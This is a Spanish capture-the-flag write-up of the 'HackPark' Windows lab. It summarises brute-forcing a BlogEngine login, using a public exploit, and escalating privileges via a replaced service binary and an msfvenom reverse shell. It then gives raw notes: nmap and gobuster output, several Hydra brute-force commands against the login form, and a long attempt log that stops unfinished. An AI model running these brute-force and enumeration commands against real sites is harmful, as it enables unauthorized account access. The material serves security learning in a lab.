🤡HACK PARK
Force bruta el inicio de sesión de un sitio web con Hydra, identifique y utilice un exploit público y luego aumente sus privilegios en esta máquina con Windows
Aquí está cómo lo hice:
1. Implementar la máquina vulnerable:
Empecé implementando la máquina virtual. Nada emocionante, solo asegurándome de tener mi entorno de prueba listo.
2. Usar Hydra para forzar un inicio de sesión:
Primero, escaneé la máquina con Nmap para encontrar los servicios en ejecución.
Luego, usé Gobuster para buscar posibles rutas o archivos en el servidor web.
Intercepté las solicitudes HTTP con Burp Proxy para entender cómo funciona el formulario de inicio de sesión.
Descubrí que el formulario usaba una solicitud POST, lo cual es clave.
Intenté una fuerza bruta con Hydra usando varios usuarios predeterminados e investigando, dando qeu el usuario era admin, solo aplique fuerza bruta sobr el password con hydra usando el diccionario Rockyou.txt, y bingo encontarmos el Passwd.
3. Comprometer la máquina:
Descubrí que el sitio web estaba utilizando BlogEngine. Busqué exploits usando searchsploit y en exploit DB.
Encontré un exploit y lo usé para obtener acceso inicial. Bingo, ya estaba dentro.
Luego usé Meterpreter para explorar la máquina, encontré la versión del sistema operativo y un servicio anormal.
4. Escalada de privilegios de Windows:
Generé un shell inverso con msfvenom para tener más control para lograr una sesion de meterpreter escuchando con multi handler de metasploit.
Descargué y ejecuté la carga útil en la máquina de destino usando el primer shell qeu conseguimos.
Con Meterpreter, obtuve información sobre el sistema y encontré un servicio anormal ejecutándose cada 30 segundos, se complico la ejecucion el binario por qeu no se me ejecutaba solo, pero pude escalas privilegios de system utilizando el comando especial de meterpreter para escalada de privilegios automatizada la cual me dijo mqeu uso el metodo 5 y se tenzo estabamos con privilegios de System, pero luego lo mismo ejecute mi binario creado con msfvenom y ejecute ahoar si el archivo del servicio recibiendo la shell en netcat como system.
Reemplacé el binario del servicio anormal con mi propia carga útil de shell inverso.
Conecté un controlador, ejecuté el exploit y se tenzo, tenía una sesión de Meterpreter con privilegios.
5. Escalada de privilegios sin Metasploit:
Cambié de una sesión de netcat inestable a un shell inverso más estable usando msfvenom.
Usé WinPeas para buscar vulnerabilidades y no pudo encontrar la informacion de instalacion del sistema qeu solicitaba, asi qeu con un comando la pude encontar y listo (luego vi en foros qeue muchos tuvieon este problema).
Conclusión:
Fue todo un viaje, explorando diferentes técnicas de hacking desde la fuerza bruta hasta la explotación de vulnerabilidades. Este resumen no te da las respuestas exactas, pero te da una idea de cómo abordé cada paso. ¡Buena suerte con tus propias aventuras de hacking!
// Some code
PENTESTING OFFENSIVO:
HackPark:
¡Force bruta el inicio de sesión de un sitio web con Hydra, identifique y utilice un exploit público y luego aumente sus privilegios en esta máquina con Windows!
ANALISIS DE LA PAGINA WEB:
http://10.10.174.239/Account/login.aspx?ReturnURL=%2fADMIN
<!--- BlogEngine 3.3.6.0 -->
<form method="post" action="login.aspx?ReturnURL=%2fADMIN" id="Form1">
<div class="aspNetHidden">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="dafpnMH9+6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2/X3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP">
</div>
<div class="aspNetHidden">
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="Tjy94c85ufC73iZyte/PDZ1wB3D/bqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN+woqOKdG3MY4wFOYEKmxK0llq5tR+foH/aDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t">
</div>
<div class="account">
<div class="account-header text-center">
<a href="https://blogengine.io/" target="_blank">
<img alt="BlogEngine.NET" src="../Content/images/blog/logo.png"></a>
</div>
<div id="StatusBox">
<div id="AdminStatus" style="display: none"></div>
</div>
<div class="account-box">
<h1 class="account-title">
<span id="lblTitle">Iniciar sesión</span>
</h1>
<div class="account-body">
<div class="form-group">
<label>Username</label>
<input name="ctl00$MainContent$LoginUser$UserName" type="text" id="UserName" class="textEntry ltr-dir">
</div>
<div class="form-group">
<label>Password</label>
<input name="ctl00$MainContent$LoginUser$Password" type="password" id="Password" class="passwordEntry ltr-dir">
</div>
<div class="form-group with-icon">
<span class="icon-form-group">
<input id="RememberMe" type="checkbox" name="ctl00$MainContent$LoginUser$RememberMe"></span>
<label for="RememberMe" id="RememberMeLabel" class="label-title ">Mantenerme autenticado</label>
</div>
<input type="submit" name="ctl00$MainContent$LoginUser$LoginButton" value="Iniciar sesión" onclick="return ValidateLogin();" id="LoginButton" class="btn btn-success btn-block btn-lg">
<div class="small-link ">
<a id="linkForgotPassword" class="text-muted" href="/Account/password-retrieval.aspx">¿Olvidó su contraseña?</a>
</div>
</div>
<script type="text/javascript">
$(document).ready(function () {
$("input[name$='UserName']").focus();
});
</script>
</div>
</div>
</form>
VEMOS UN SERVICIO QUE IUTILIZA EL LOGIN:
<img alt="BlogEngine.NET" src="../Content/images/blog/logo.png">
ESACNEO NMAP:
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O -Pn --script "vuln" 10.10.174.239
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-25 00:33 UTC
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Stats: 0:02:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 94.81% done; ETC: 00:36 (0:00:04 remaining)
Nmap scan report for ip-10-10-174-239.eu-west-1.compute.internal (10.10.174.239)
Host is up (0.00051s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ip-10-10-174-239.eu-west-1.compute.internal
| Found the following possible CSRF vulnerabilities:
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/
| Form id: aspnetform
| Form action: /
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/author/Admin
| Form id: aspnetform
| Form action: /author/Admin
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/archive
| Form id: aspnetform
| Form action: /archive
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/post/welcome-to-hack-park
| Form id: aspnetform
| Form action: /post/welcome-to-hack-park
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/category/BlogEngineNET
| Form id: aspnetform
|_ Form action: /category/BlogEngineNET
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /calendar/cal_search.php: ExtCalendar
| /robots.txt: Robots file
| /calendar/cal_cat.php: Calendarix
| /archive/: Potentially interesting folder
| /archives/: Potentially interesting folder
| /author/: Potentially interesting folder
| /contact/: Potentially interesting folder
| /contacts/: Potentially interesting folder
| /search/: Potentially interesting folder
|_ /search-ui/: Potentially interesting folder
|_http-server-header: Microsoft-IIS/8.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:microsoft:internet_information_services:8.5:
|_ CVE-2014-4078 5.1 https://vulners.com/cve/CVE-2014-4078
3389/tcp open ssl/ms-wbt-server?
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
MAC Address: 02:DA:32:DD:AC:71 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 214.52 seconds
BUSCA POSIBLES DIRECTORIOS DE RUTAS:
gobuster dir -u http://10.10.174.239/ -w /usr/share/wordlists/dirb/common.txt
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.174.239/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.174.239/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2024/01/25 00:51:10 Starting gobuster in directory enumeration mode
===============================================================
/account (Status: 301) [Size: 152] [--> http://10.10.174.239/account/]
/admin (Status: 302) [Size: 173] [--> http://10.10.174.239/Account/login.aspx?ReturnURL=/admin]
/Admin (Status: 302) [Size: 173] [--> http://10.10.174.239/Account/login.aspx?ReturnURL=/Admin]
/ADMIN (Status: 302) [Size: 173] [--> http://10.10.174.239/Account/login.aspx?ReturnURL=/ADMIN]
/Archive (Status: 200) [Size: 8325]
/archives (Status: 200) [Size: 8326]
/archive (Status: 200) [Size: 8325]
/aspnet_client (Status: 301) [Size: 158] [--> http://10.10.174.239/aspnet_client/]
/aux (Status: 500) [Size: 1763]
/Blog (Status: 500) [Size: 1208]
/blog (Status: 500) [Size: 1208]
/com1 (Status: 500) [Size: 1763]
/com2 (Status: 500) [Size: 1763]
/com3 (Status: 500) [Size: 1763]
/contact (Status: 200) [Size: 9935]
/Contact (Status: 200) [Size: 9935]
/contact_bean (Status: 200) [Size: 9940]
/contact_us (Status: 200) [Size: 9938]
/contact-form (Status: 200) [Size: 9940]
/contactinfo (Status: 200) [Size: 9939]
/contacts (Status: 200) [Size: 9936]
/contacto (Status: 200) [Size: 9936]
/contactus (Status: 200) [Size: 9937]
/ContactUs (Status: 200) [Size: 9937]
/contact-us (Status: 200) [Size: 9938]
/content (Status: 301) [Size: 152] [--> http://10.10.174.239/content/]
/Content (Status: 301) [Size: 152] [--> http://10.10.174.239/Content/]
/con (Status: 500) [Size: 1763]
/custom (Status: 301) [Size: 151] [--> http://10.10.174.239/custom/]
/Default (Status: 500) [Size: 1763]
/default_icon (Status: 500) [Size: 1763]
/default_image (Status: 500) [Size: 1763]
/defaults (Status: 500) [Size: 1763]
/default_pages (Status: 500) [Size: 1763]
/default_page (Status: 500) [Size: 1763]
/default_logo (Status: 500) [Size: 1763]
/default (Status: 500) [Size: 1763]
/fonts (Status: 301) [Size: 150] [--> http://10.10.174.239/fonts/]
/lpt2 (Status: 500) [Size: 1763]
/lpt1 (Status: 500) [Size: 1763]
/nul (Status: 500) [Size: 1763]
/prn (Status: 500) [Size: 1763]
/robots.txt (Status: 200) [Size: 303]
/Scripts (Status: 301) [Size: 152] [--> http://10.10.174.239/Scripts/]
/scripts (Status: 301) [Size: 152] [--> http://10.10.174.239/scripts/]
/search (Status: 200) [Size: 8407]
/Search (Status: 200) [Size: 8407]
/search_result (Status: 200) [Size: 8414]
/search_results (Status: 200) [Size: 8415]
/searchnx (Status: 200) [Size: 8409]
/search-results (Status: 200) [Size: 8415]
/searchurl (Status: 200) [Size: 8410]
/searchresults (Status: 200) [Size: 8414]
/setup (Status: 302) [Size: 175] [--> http://10.10.174.239/Account/login.aspx?ReturnUrl=%2fsetup]
Progress: 3851 / 4615 (83.45%)===============================================================
2024/01/25 00:51:13 Finished
===============================================================
PROBAMOS HACER FUERZA BRUTA AL FORMULARIO DEL LOGIN BURPSUITE:
PROBAMOS HACER FUERZA BRUTA AL FORMULARIO DEL LOGIN HYDRA:
http://10.10.174.239/Account/login.aspx?ReturnURL=%2fADMIN
hydra -l penywise -P /usr/share/wordlists/rokyou.txt 10.10.174.239 http-post-form -vV
hydra -l penywise -P /usr/share/wordlists/rokyou.txt http://10.10.174.239/Account/login.aspx?ReturnURL=/admin/ http-post-form -vV
hydra -l penywise -P /usr/share/wordlists/rokyou.txt 10.10.174.239 -V http-post-form '__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00%24MainContent%24LoginUser%24UserName=penywise&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n' -vV
/login.aspx?ReturnURL=%2fADMIN:
hydra -l penywise -P /usr/share/wordlists/rokyou.txt 10.10.174.239 -V http-post-form '/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00%24MainContent%24LoginUser%24UserName=penywise&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n' -vV
hydra -l penywise -P /usr/share/wordlists/rokyou.txt 10.10.174.239 -V http-post-form '/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00%24MainContent%24LoginUser%24UserName=penywise&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n' -vV
FUNCIONO SACAMOS LA SOLUICITUD DE LA URL + LO ENVIADO POR POST VISTO EN BURSUITE:
hydra -l penywise -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n:Login failed"
TAMBIEN FUNCIONO:
hydra -l penywise -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00$MainContent$LoginUser$UserName=penywise&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n:Login failed"
FUNCIONO:
hydra -l penywise -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=^VIEWSTATE^&__EVENTVALIDATION=^EVENTVALIDATION^&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n:Login failed"
┌──(root㉿kali)-[/usr/share/wordlists]
└─# hydra -l penywise -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=^VIEWSTATE^&__EVENTVALIDATION=^EVENTVALIDATION^&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n:Login failed"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-25 01:33:32
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.174.239:80/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=^VIEWSTATE^&__EVENTVALIDATION=^EVENTVALIDATION^&ctl00=^USER^&ctl00=^PASS^&ctl00=Iniciar+sesi%C3%B3n:Login failed
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "654321" - 17 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "michael" - 18 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "ashley" - 19 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "qwerty" - 20 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "111111" - 21 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "iloveu" - 22 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "000000" - 23 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "michelle" - 24 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "tigger" - 25 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "sunshine" - 26 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "chocolate" - 27 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "password1" - 28 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "soccer" - 29 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "anthony" - 30 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "friends" - 31 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "butterfly" - 32 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "purple" - 33 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "angel" - 34 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jordan" - 35 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "liverpool" - 36 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "justin" - 37 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "loveme" - 38 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "fuckyou" - 39 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "123123" - 40 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "football" - 41 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "secret" - 42 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "andrea" - 43 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "carlos" - 44 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jennifer" - 45 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "joshua" - 46 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "bubbles" - 47 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "1234567890" - 48 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "superman" - 49 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "hannah" - 50 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "melissa" - 74 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "eminem" - 75 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "matthew" - 76 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "robert" - 77 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "danielle" - 78 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "forever" - 79 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "family" - 80 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jonathan" - 81 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "987654321" - 82 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "computer" - 83 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "whatever" - 84 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "dragon" - 85 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "vanessa" - 86 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "cookie" - 87 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "naruto" - 88 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "summer" - 89 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "sweety" - 90 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "spongebob" - 91 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "joseph" - 92 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "junior" - 93 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "softball" - 94 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "taylor" - 95 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "yellow" - 96 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "daniela" - 97 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "lauren" - 98 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "mickey" - 99 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "princesa" - 100 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "alexandra" - 101 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "alexis" - 102 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jesus" - 103 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "estrella" - 104 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "miguel" - 105 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "william" - 106 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "thomas" - 107 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "beautiful" - 108 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "mylove" - 109 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "angela" - 110 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "poohbear" - 111 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "patrick" - 112 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "iloveme" - 113 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "sakura" - 114 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "adrian" - 115 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "alexander" - 116 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "destiny" - 117 of 14344399 [child 3] (0/0)
